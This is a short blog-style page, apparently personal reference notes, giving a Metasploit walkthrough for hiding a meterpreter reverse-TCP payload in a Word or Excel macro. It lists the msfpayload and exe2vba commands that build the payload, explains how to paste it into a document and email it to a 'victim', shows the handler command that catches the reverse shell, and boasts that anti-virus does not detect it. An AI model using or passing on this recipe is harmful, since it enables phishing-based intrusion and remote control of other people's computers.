Subscribe by RSS RSS Icon
Follow me on Twitter Twitter Icon

Metasploit - VBScript Infection Method

Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. This method is useful when going after client-side attacks and could also be potentially useful if you have to bypass some sort of filtering that does not allow executables and only permits documents to pass through. To begin, we first need to create our VBScript payload.

./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=8080 ENCODING=shikata_ga_nai X > payload.exe

Then, we need to convert our executable to VBScript using the "exe2vba.rb" script in the tools section:
ruby exe2vba.rb payload.exe payload.vbs

Now, copy our payload.vbs to Windows machine that has Microsoft Word or Excel installed. In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor, if you're using Word/Excel 2007, go to View Macros, then place a name like "dgodam" for your macro and select "create".

This will open up the visual basic editor. Paste the output of the first portion of the payload script into the editor and save it.

Paste the remainder of the script into the word document itself. This is when you would perform the client-side attack by emailing this Word document to someone. 

Before we send off our malicious document to our victim, we first need to set up our Metasploit listener:

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=8080 E

We have our listener now on port 8080 waiting for a reverse connection from our victim.

We have a Meterpreter shell right to the system that opened the document, and best of all, it doesn't get picked up by anti-virus!!!


Copyright Info.

Only for my personal reference. I do not own any of these materials here. Use it at your own risk!

XHTML/CSS validations
Valid XHTML 1.0 Transitional Valid CSS!